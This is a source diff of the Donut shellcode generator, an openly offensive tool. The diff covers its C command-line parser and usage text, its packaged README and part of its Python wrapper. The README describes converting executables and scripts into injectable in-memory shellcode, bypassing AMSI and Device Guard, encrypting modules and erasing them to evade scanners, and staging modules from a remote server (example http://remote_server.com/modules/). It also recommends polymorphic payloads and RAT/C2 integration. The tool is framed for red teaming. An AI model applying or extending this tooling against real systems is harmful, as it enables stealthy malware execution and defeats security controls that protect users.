1662 str = "There was an error during compression.";
1663 break;
1664 case DONUT_ERROR_INVALID_ENTROPY:
1665 str = "Invalid entropy level specified.";
1666 break;
1667 }
1668 DPRINT("Error result : %s", str);
11571669 return str;
11581670 }
11591671
1672 #ifdef DONUT_EXE
11601673 static char* get_param (int argc, char *argv[], int *i) {
11611674 int n = *i;
11621675 if (argv[n][2] != 0) {
11701683 exit (0);
11711684 }
11721685
1686
11731687 static void usage (void) {
1174 printf(" usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>\n\n");
1175
1688 printf(" usage: donut [options] <EXE/DLL/VBS/JS>\n\n");
1689 printf(" Only the finest artisanal donuts are made of shells.\n\n");
11761690 printf(" -MODULE OPTIONS-\n\n");
1177 printf(" -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.\n");
1178 printf(" -u <URL> HTTP server that will host the donut module.\n\n");
1179
1691 printf(" -n <name> Module name for HTTP staging. If entropy is enabled, this is generated randomly.\n");
1692 printf(" -s <server> HTTP server that will host the donut module.\n");
1693 printf(" -e <level> Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)\n\n");
1694
11801695 printf(" -PIC/SHELLCODE OPTIONS-\n\n");
1181 printf(" -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).\n");
1182 printf(" -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)\n");
1183 printf(" -o <payload> Output file. Default is \"payload.bin\"\n\n");
1184
1185 printf(" -DOTNET OPTIONS-\n\n");
1186 printf(" -c <namespace.class> Optional class name. (required for .NET DLL)\n");
1187 printf(" -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)\n");
1188 printf(" -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.\n");
1696 printf(" -a <arch> Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).\n");
1697 printf(" -b <level> Bypass AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)\n");
1698 printf(" -o <path> Output file to save loader. Default is \"loader.bin\"\n");
1699 printf(" -f <format> Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex\n");
1700 printf(" -y <addr> Create thread for loader and continue execution at <addr> supplied.\n");
1701 printf(" -x <action> Exiting. 1=Exit thread (default), 2=Exit process\n\n");
1702
1703 printf(" -FILE OPTIONS-\n\n");
1704 printf(" -c <namespace.class> Optional class name. (required for .NET DLL)\n");
1705 printf(" -d <name> AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.\n");
1706 printf(" -m <method | api> Optional method or function for DLL. (a method is required for .NET DLL)\n");
1707 printf(" -p <arguments> Optional parameters/command line inside quotations for DLL method/function or EXE.\n");
1708 printf(" -w Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)\n");
11891709 printf(" -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.\n");
1190 printf(" -d <name> AppDomain name to create for .NET. Randomly generated by default.\n\n");
1710 printf(" -t Execute the entrypoint of an unmanaged EXE as a thread.\n");
1711 #ifdef WINDOWS
1712 printf(" -z <engine> Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman\n\n");
1713 #else
1714 printf(" -z <engine> Pack/Compress file. 1=None, 2=aPLib\n\n");
1715 #endif
11911716
11921717 printf(" examples:\n\n");
1193 printf(" donut -f c2.dll\n");
1194 printf(" donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll\n");
1195 printf(" donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/\n");
1718 printf(" donut c2.dll\n");
1719 printf(" donut -a1 -cTestClass -mRunProcess -pnotepad.exe loader.dll\n");
1720 printf(" donut loader.dll -c TestClass -m RunProcess -p\"calc notepad\" -s http://remote_server.com/modules/\n");
11961721
11971722 exit (0);
11981723 }
12011726 DONUT_CONFIG c;
12021727 char opt;
12031728 int i, err;
1204 FILE *fd;
1205 char *mod_type, *payload="payload.bin",
1206 *arch_str[3] = { "x86", "AMD64", "x86+AMD64" };
1207 char *inst_type[2]= { "PIC", "URL" };
1729 char *mod_type;
1730 char *arch_str[3] = { "x86", "amd64", "x86+amd64" };
1731 char *inst_type[2]= { "Embedded", "HTTP" };
12081732
12091733 printf("\n");
1210 printf(" [ Donut shellcode generator v0.9.2\n");
1734 printf(" [ Donut shellcode generator v0.9.3\n");
12111735 printf(" [ Copyright (c) 2019 TheWover, Odzhan\n\n");
12121736
12131737 // zero initialize configuration
12141738 memset(&c, 0, sizeof(c));
12151739
1216 // default type is position independent code for dual-mode (x86 + amd64)
1217 c.inst_type = DONUT_INSTANCE_PIC;
1218 c.arch = DONUT_ARCH_X84;
1740 // default settings
1741 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
1742 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
12191743 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
1744 c.format = DONUT_FORMAT_BINARY; // default output format
1745 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
1746 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
1747 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
1748 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
12201749
12211750 // parse arguments
12221751 for(i=1; i<argc; i++) {
12231752 // switch?
1224 if(argv[i][0] != '-' && argv[i][0] != '/') {
1225 usage();
1226 }
1227 opt = argv[i][1];
1228
1229 switch(opt) {
1230 // target cpu architecture
1231 case 'a':
1232 c.arch = atoi(get_param(argc, argv, &i));
1233 break;
1234 // bypass options
1235 case 'b':
1236 c.bypass = atoi(get_param(argc, argv, &i));
1237 break;
1238 // name of domain to use for .NET assembly
1239 case 'd':
1240 strncpy(c.domain, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1241 break;
1242 // EXE/DLL/VBS/JS/XSL file to embed in shellcode
1243 case 'f':
1244 strncpy(c.file, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1245 break;
1246 // runtime version to use for .NET DLL / EXE
1247 case 'r':
1248 strncpy(c.runtime, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1249 break;
1250 // URL of remote module
1251 case 'u': {
1252 strncpy(c.url, get_param(argc, argv, &i), DONUT_MAX_URL - 2);
1253 c.inst_type = DONUT_INSTANCE_URL;
1254 break;
1753 if(argv[i][0] == '-') {
1754 opt = argv[i][1];
1755
1756 switch(opt) {
1757 // target cpu architecture
1758 case 'a': {
1759 c.arch = atoi(get_param(argc, argv, &i));
1760 break;
1761 }
1762 // bypass options
1763 case 'b': {
1764 c.bypass = atoi(get_param(argc, argv, &i));
1765 break;
1766 }
1767 // class of .NET assembly
1768 case 'c': {
1769 strncpy(c.cls, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1770 break;
1771 }
1772 // name of domain to use for .NET assembly
1773 case 'd': {
1774 strncpy(c.domain, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1775 break;
1776 }
1777 // encryption options
1778 case 'e': {
1779 c.entropy = atoi(get_param(argc, argv, &i));
1780 break;
1781 }
1782 // output format
1783 case 'f': {
1784 c.format = atoi(get_param(argc, argv, &i));
1785 break;
1786 }
1787 // method of .NET assembly
1788 case 'm': {
1789 strncpy(c.method, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1790 break;
1791 }
1792 // module name
1793 case 'n': {
1794 strncpy(c.modname, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1795 break;
1796 }
1797 // output file for loader
1798 case 'o': {
1799 strncpy(c.output, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1800 break;
1801 }
1802 // parameters to method, DLL function or command line for unmanaged EXE
1803 case 'p': {
1804 strncpy(c.param, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1805 break;
1806 }
1807 // runtime version to use for .NET DLL / EXE
1808 case 'r': {
1809 strncpy(c.runtime, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1810 break;
1811 }
1812 // run entrypoint of unmanaged EXE as a thread
1813 case 't': {
1814 c.thread = 1;
1815 break;
1816 }
1817 // server
1818 case 's': {
1819 strncpy(c.server, get_param(argc, argv, &i), DONUT_MAX_NAME - 2);
1820 c.inst_type = DONUT_INSTANCE_HTTP;
1821 break;
1822 }
1823 // convert param to unicode? only applies to unmanaged DLL function
1824 case 'w': {
1825 c.unicode = 1;
1826 break;
1827 }
1828 // call RtlExitUserProcess to terminate host process
1829 case 'x': {
1830 c.exit_opt = atoi(get_param(argc, argv, &i));
1831 break;
1832 }
1833 // fork a new thread and execute address of original entry point
1834 case 'y': {
1835 c.oep = strtoull(get_param(argc, argv, &i), NULL, 16);
1836 break;
1837 }
1838 // pack/compress input file
1839 case 'z': {
1840 c.compress = atoi(get_param(argc, argv, &i));
1841 break;
1842 }
1843 // for anything else, display usage
1844 default: {
1845 usage();
1846 break;
1847 }
12551848 }
1256 // class of .NET assembly
1257 case 'c':
1258 strncpy(c.cls, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1259 break;
1260 // method of .NET assembly
1261 case 'm':
1262 strncpy(c.method, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1263 break;
1264 // output file for payload
1265 case 'o':
1266 payload = get_param(argc, argv, &i);
1267 break;
1268 // parameters to method or DLL function
1269 case 'p':
1270 strncpy(c.param, get_param(argc, argv, &i), sizeof(c.param) - 1);
1271 break;
1272 default:
1273 usage();
1274 break;
1849 } else {
1850 // assume it's an EXE/DLL/VBS/JS file to embed in shellcode
1851 strncpy(c.input, argv[i], DONUT_MAX_NAME - 1);
12751852 }
12761853 }
12771854
12781855 // no file? show usage and exit
1279 if(c.file[0] == 0) {
1856 if(c.input[0] == 0) {
12801857 usage();
12811858 }
12821859
1283 // generate payload from configuration
1860 // generate loader from configuration
12841861 err = DonutCreate(&c);
1285
1862
12861863 if(err != DONUT_ERROR_SUCCESS) {
1287 printf(" [ Error : %s\n", err2str(err));
1864 printf(" [ Error : %s\n", DonutError(err));
12881865 return 0;
12891866 }
12901867
13071884 case DONUT_MODULE_JS:
13081885 mod_type = "JScript";
13091886 break;
1310 case DONUT_MODULE_XSL:
1311 mod_type = "XSL";
1312 break;
13131887 default:
13141888 mod_type = "Unrecognized";
13151889 break;
13161890 }
1891
13171892 printf(" [ Instance type : %s\n", inst_type[c.inst_type - 1]);
1318 printf(" [ Module file : \"%s\"\n", c.file );
1893 printf(" [ Module file : \"%s\"\n", c.input);
1894 printf(" [ Entropy : %s\n",
1895 c.entropy == DONUT_ENTROPY_NONE ? "None" :
1896 c.entropy == DONUT_ENTROPY_RANDOM ? "Random Names" : "Random names + Encryption");
1897
1898 if(c.compress != DONUT_COMPRESS_NONE) {
1899 printf(" [ Compressed : %s (Reduced by %"PRId32"%%)\n",
1900 c.compress == DONUT_COMPRESS_APLIB ? "aPLib" :
1901 c.compress == DONUT_COMPRESS_LZNT1 ? "LZNT1" :
1902 c.compress == DONUT_COMPRESS_XPRESS ? "Xpress" : "Xpress Huffman",
1903 file_diff(c.zlen, c.len));
1904 }
1905
13191906 printf(" [ File type : %s\n", mod_type);
13201907
13211908 // if this is a .NET DLL, display the class and method
13331920 }
13341921 printf(" [ Target CPU : %s\n", arch_str[c.arch - 1]);
13351922
1336 if(c.inst_type == DONUT_INSTANCE_URL) {
1923 if(c.inst_type == DONUT_INSTANCE_HTTP) {
13371924 printf(" [ Module name : %s\n", c.modname);
1338 printf(" [ Upload to : %s\n", c.url);
1925 printf(" [ Upload to : %s\n", c.server);
13391926 }
13401927
13411928 printf(" [ AMSI/WDLP : %s\n",
1342 c.bypass == DONUT_BYPASS_SKIP ? "skip" :
1929 c.bypass == DONUT_BYPASS_NONE ? "none" :
13431930 c.bypass == DONUT_BYPASS_ABORT ? "abort" : "continue");
13441931
1345 printf(" [ Shellcode : \"%s\"\n\n", payload);
1346 fd = fopen(payload, "wb");
1347
1348 if(fd != NULL) {
1349 fwrite(c.pic, sizeof(char), c.pic_len, fd);
1350 fclose(fd);
1351 } else {
1352 printf(" [ Error opening \"%s\" for payload.\n", payload);
1353 }
1354 // release resources
1932 printf(" [ Shellcode : \"%s\"\n", c.output);
1933 if(c.oep != 0) {
1934 printf(" [ OEP : 0x%"PRIX64"\n", c.oep);
1935 }
1936
13551937 DonutDelete(&c);
13561938 return 0;
13571939 }
+0
-264
donut_shellcode.egg-info/PKG-INFO less more
0 Metadata-Version: 2.1
1 Name: donut-shellcode
2 Version: 0.9.2
3 Summary: Donut Python C extension
4 Home-page: https://github.com/TheWover/donut
5 Author: TheWover, Odzhan, byt3bl33d3r
6 License: UNKNOWN
7 Description: # Using Donut
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 Version: 0.9.2 *please submit issues and requests for v1.0 release*
12
13 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
14
15 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
16
17 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
18
19 ## Introduction
20
21 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
22
23 It can be used in several ways.
24
25 ## As a Standalone Tool
26
27 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
28
29 ```
30
31 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
32
33 -MODULE OPTIONS-
34
35 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
36 -u <URL> HTTP server that will host the donut module.
37
38 -PIC/SHELLCODE OPTIONS-
39
40 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
41 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
42 -o <payload> Output file. Default is "payload.bin"
43
44 -DOTNET OPTIONS-
45
46 -c <namespace.class> Optional class name. (required for .NET DLL)
47 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
48 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
49 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
50 -d <name> AppDomain name to create for .NET. Randomly generated by default.
51
52 examples:
53
54 donut -f c2.dll
55 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
56 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
57
58 ```
59
60 ### Building Donut
61
62 Tags have been provided for each release version of donut that contain the compiled executables.
63
64 * v0.9.2, Bear Claw:
65 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
66 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
67 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
68
69 However, you may also clone and build the source yourself using the provided makefiles.
70
71 ## Building From Repository
72
73 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
74
75 ```
76 git clone http://github.com/thewover/donut
77 cd donut
78 ```
79
80 ## Linux
81
82 Simply run make to generate an executable, static and dynamic libraries.
83
84 ```
85 make
86 make clean
87 make debug
88 ```
89
90 ## Windows
91
92 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
93
94 ```
95 nmake -f Makefile.msvc
96 nmake clean -f Makefile.msvc
97 nmake debug -f Makefile.msvc
98 ```
99
100 ## As a Library
101
102 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
103
104 ## As a Python Module
105
106 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
107
108 ```
109 pip install .
110 ```
111
112 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
113
114 ```
115 pip install donut-shellcode
116 ```
117
118 ## As a Template - Rebuilding the shellcode
119
120 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
121
122 ### Microsoft Visual Studio
123
124 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
125
126 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
127
128 ```
129 nmake clean -f Makefile.msvc
130 nmake -f Makefile.msvc
131 ```
132
133 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
134
135 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
136
137 ```
138 nmake clean -f Makefile.msvc
139 nmake x86 -f Makefile.msvc
140 ```
141
142 This will save the shellcode as a C array to *payload_exe_x86.h*.
143
144 ### Mingw-w64
145
146 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
147
148 ```
149 make clean -f Makefile.mingw
150 make -f Makefile.mingw
151 ```
152
153 Once you've recompiled for all architectures, you may rebuild donut.
154
155 ## Bypasses
156
157 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
158
159 * AMSI in .NET v4.8
160 * Device Guard policy preventing dynamicly generated code from executing
161
162 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
163
164 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
165
166 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
167
168 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
169
170 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
171
172 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
173
174 ### Additional features.
175
176 These are left as exercises to the reader. I would personally recommend:
177
178 * Add environmental keying
179 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
180 * Integrate donut as a module into your favorite RAT/C2 Framework
181
182 ## Disclaimers
183
184 * No, we will not update donut to counter signatures or detections by any AV.
185 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
186
187 # How it works
188
189 ## Procedure for Assemblies
190
191 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
192
193 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
194
195 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
196
197 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
198
199 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
200
201 ## Procedure for ActiveScript/XSL
202
203 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
204
205 ## Procedure for PE Loading
206
207 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
208
209 ## Components
210
211 Donut contains the following elements:
212
213 * donut.c: The source code for the donut payload generator
214 * donut.exe: The compiled payload generator as an EXE
215 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
216 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
217 * setup.py: The setup file for installing Donut as a Pip Python3 module.
218 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
219 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
220 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
221 * payload/payload.c: Main file for the shellcode.
222 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
223 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
224 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
225 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
226 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
227 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
228 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
229 * payload/http_client.c: Downloads a module from remote staging server into memory.
230 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
231 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
232 * payload/inject.exe: The compiled C shellcode injector
233 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
234 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
235 * payload/runsc.exe: The compiled C shellcode runner
236 * payload/exe2h/exe2h.c: Source code for exe2h
237 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
238 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
239 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
240
241 # Subprojects
242
243 There are three companion projects provided with donut:
244
245 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
246 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
247 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
248 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
249
250 # Project plan
251
252 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
253 * Create a C# version of the generator.
254 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
255 * Add support for HTTP proxies.
256 ~~* Find ways to simplify the shellcode if possible.~~
257 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
258 * ~~Dynamic Calls to DLL functions.~~
259 * Handle the ProcessExit event from AppDomain using unmanaged code.
260
261 Platform: UNKNOWN
262 Requires-Python: >=3.0
263 Description-Content-Type: text/markdown
+0
-103
donut_shellcode.egg-info/SOURCES.txt less more
0 LICENSE
1 MANIFEST.in
2 Makefile
3 Makefile.mingw
4 Makefile.msvc
5 README.md
6 donut.c
7 donutmodule.c
8 encrypt.c
9 hash.c
10 setup.py
11 version-release-notes.txt
12 ./donut.c
13 ./donutmodule.c
14 ./encrypt.c
15 ./hash.c
16 ./DonutTest/hello.c
17 ./DonutTest/testcase.c
18 ./include/mmap-windows.c
19 ./payload/activescript.c
20 ./payload/bypass.c
21 ./payload/clib.c
22 ./payload/getpc.c
23 ./payload/http_client.c
24 ./payload/inject.c
25 ./payload/inmem_dotnet.c
26 ./payload/inmem_pe.c
27 ./payload/inmem_script.c
28 ./payload/inmem_xsl.c
29 ./payload/payload.c
30 ./payload/peb.c
31 ./payload/runsc.c
32 ./payload/wscript.c
33 ./payload/exe2h/exe2h.c
34 ./payload/exe2h/mmap-windows.c
35 ./payload/test/api_test.c
36 ./payload/test/call_api_dll.c
37 ./payload/test/hello.c
38 docs/2019-08-21-Python_Extension.md
39 docs/2019-5-31-Apple-Fritter.md
40 docs/2019-5-9-Introducing-Donut.md
41 docs/api.html
42 docs/api.md
43 donut_shellcode.egg-info/PKG-INFO
44 donut_shellcode.egg-info/SOURCES.txt
45 donut_shellcode.egg-info/dependency_links.txt
46 donut_shellcode.egg-info/top_level.txt
47 donut_shellcode.egg-info/zip-safe
48 include/donut.h
49 include/encrypt.h
50 include/hash.h
51 include/mmap-windows.c
52 include/mmap.h
53 include/pe.h
54 include/poppack.h
55 include/pshpack1.h
56 include/pshpack2.h
57 include/pshpack4.h
58 include/pshpack8.h
59 include/wintypes.h
60 lib/donut.h
61 payload/Makefile.mingw
62 payload/Makefile.msvc
63 payload/activescript.c
64 payload/activescript.h
65 payload/amsi.h
66 payload/bypass.c
67 payload/call_api.asm
68 payload/call_api_bin.h
69 payload/clib.c
70 payload/clr.h
71 payload/getpc.c
72 payload/http_client.c
73 payload/inject.c
74 payload/inmem_dotnet.c
75 payload/inmem_pe.c
76 payload/inmem_script.c
77 payload/inmem_xsl.c
78 payload/order.txt
79 payload/payload.c
80 payload/payload.h
81 payload/payload_exe_x64.h
82 payload/payload_exe_x86.h
83 payload/peb.c
84 payload/peb.h
85 payload/runsc.c
86 payload/winapi.h
87 payload/wscript.c
88 payload/wscript.h
89 payload/xmldom.h
90 payload/exe2h/Makefile
91 payload/exe2h/Makefile.mingw
92 payload/exe2h/Makefile.msvc
93 payload/exe2h/exe2h.c
94 payload/exe2h/exe2h.obj
95 payload/exe2h/mmap-windows.c
96 payload/exe2h/mmap-windows.obj
97 payload/exe2h/mmap.h
98 payload/test/api_test.c
99 payload/test/call_api_dll.c
100 payload/test/hello.c
101 payload/test/hello.cs
102 payload/test/rdt.cpp
+0
-1
donut_shellcode.egg-info/dependency_links.txt less more
0
+0
-1
donut_shellcode.egg-info/top_level.txt less more
0 donut
+0
-1
donut_shellcode.egg-info/zip-safe less more
0
+120
-69
donutmodule.c less more
3333 #include <Python.h>
3434 #include "donut.h"
3535
36
3736 static PyObject *Donut_Create(PyObject *self, PyObject *args, PyObject *keywds) {
38 int *arch = NULL;
39 int *bypass = NULL;
40 char *appdomain = NULL;
41 char *file = NULL;
42 char *runtime = NULL;
43 char *url = NULL;
44 char *cls = NULL;
45 char *method = NULL;
46 char *params = NULL;
47
48 int err;
49
50 static char *kwlist[] = {"file", "url", "arch", "bypass", "cls", "method", "params", "runtime", "appdomain", NULL};
51 if (!PyArg_ParseTupleAndKeywords(args, keywds, "s|siisssss", kwlist, &file, &url, &arch, &bypass, &cls, &method, &params, &runtime, &appdomain)) {
37 char *input = NULL; // input file to execute in-memory
38
39 int arch = 0; // target CPU architecture or mode
40 int bypass = 0; // AMSI/WDLP bypassing behavior
41 int compress = 0; // compress input file
42 int entropy = 0; // whether to randomize API hashes and use encryption
43 int format = 0; // output format
44 int exit_opt = 0; // exit process or exit thread
45 int thread = 0; // run unmanaged entrypoint as a thread
46 char *oep = NULL; // creates new thread for loader and continues execution at specified address provided in hexadecimal format
47
48 char *output = NULL; // name of loader stored on disk
49
50 char *runtime = NULL; // runtime version
51 char *domain = NULL; // app domain name to use
52 char *cls = NULL; // class name
53 char *method = NULL; // method name
54
55 char *params = NULL; // parameters for method
56 int unicode = 0; // param is converted to unicode before being passed to unmanaged DLL function
57
58 char *server = NULL; // HTTP server to download module from
59 char *modname = NULL; // name of module stored on HTTP server
60
61 static char *kwlist[] = {
62 "file", "arch", "bypass", "compress", "entropy",
63 "format", "exit_opt", "thread", "oep", "output",
64 "runtime", "appdomain", "cls", "method", "params",
65 "unicode", "server", "url", "modname", NULL};
66
67 if (!PyArg_ParseTupleAndKeywords(
68 args, keywds, "s|iiiiiiisssssssisss", kwlist, &input, &arch,
69 &bypass, &compress, &entropy, &format, &exit_opt, &thread,
70 &oep, &output, &runtime, &domain, &cls, &method, &params,
71 &unicode, &server, &server, &modname))
72 {
5273 return NULL;
5374 }
5475
5677
5778 // zero initialize configuration
5879 memset(&c, 0, sizeof(c));
59
